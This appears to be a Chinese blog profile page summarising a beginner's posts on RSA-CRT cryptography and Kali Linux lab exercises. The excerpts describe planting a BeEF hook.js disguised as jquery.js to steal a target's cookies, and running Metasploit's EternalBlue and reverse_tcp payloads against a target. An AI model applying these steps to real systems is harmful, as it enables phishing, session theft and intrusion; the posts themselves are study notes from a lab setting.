- 博客(8)
- 收藏
- 关注
RSS订阅原创 密码学学习之费马小定理 & 中国剩余定理应用:RSA-CRT 签名算法
那么d = k1*(q-1) +dp,带入解密公式,可得c^d mod p =c^(k1(p-1) +dp) mod p=c^dp * c^(k1(p-1)) mod p,因为 c^(p-1) mod p = 1 (欧拉定理)= c^k1 mod p,这样就成功降解密的次幂阶从d降到了k1,这里的k1 = d mod dp,这么看是不是很巧呢?这里不光是dp,还可以用dq(dq = d mod (q-1),即d = dq mod (q-1)),来降低d,总之是个很灵活的事。加密Y= M^e mod n;
2023-08-19 16:13:13
575
原创 kali linux小白学习(beef网络钓鱼攻击)
之后,执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令,执行ls命令可看出生成了一个攻击文件jquery.js,该文件包含xss攻击代码<script src=打开var/www/html文件并查看里面的文件(linux目录下有个目录:/回到kali机,可以看到上钩了,我可以查看他的cookie了。之后进入靶机,把kali机的ip地址输入,可以看到上钩了。1.解析网页语言,如html,php,jsp等。
2023-06-01 14:53:33
286
2
原创 小白学习kali linux day5(XSS漏洞学习)
上图的beef-xss打开失败,可以给kali换源,执行vim /etc/apt/sources.list,再分别执行sudo apt-get update和sudo apt-get upgrade两个命令,我换的阿里源。然后执行apt remove beef-xss把beff-xss卸载,再apt-get install beef-xss执行重装。若忘记密码,则查看其配置文件:vim /etc/beef-xss/config.yaml /之后启动beef工具:绿色框框里为beef密码,可以为123.
2023-05-29 21:26:13
612
原创 kali linux学习day4
两种,一种为reverse_tcp(反连接,即让靶机连接本kali,比较安全,不容易被防火墙发现),一种为build_tcp(主动建立连接,容易被发现)。上图中的-f表示format(格式为exe文件,若攻击的是安卓系统,则攻击的格式为apk)。接着在kali中输入msfconsole打开渗透工具,再输入search+攻击名称,并以use+攻击模块的形式以选择攻击模块,再输入set RHOSTS+靶机ip,以将该地址作为攻击目标,然后运行命令run,就可以进行永恒之蓝渗透,获取目标靶机的权限。
2023-05-19 17:36:10
674
原创 小白kali linux学习 day3
安装靶机如下图:如果靶机连不上网,试试看这样设置,然后ping一下baidu.com测试一下是否连上网了,设置如下图:
2023-05-16 21:58:32
60
原创 kali linux day2
进入管理员模式后,输入命令 msfconsole(这里msf是metasploit framework的缩写,console表示这是一个接口),然后会输出你的msf6,这里的6指的是版本号。之后可以输入”use+模块编号“或”use+模块名称“来使用该模块,再输入show options查看这些模块有哪些设置项,比如手机的亮度、声音大小等。输入”search + 漏洞编号“来扫面漏洞来查看漏洞的模块结构,漏洞编号可以在微软官方平台上搜到,若自己找到新漏洞,也可以自己去平台上更新。
2023-05-16 16:47:12
93
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人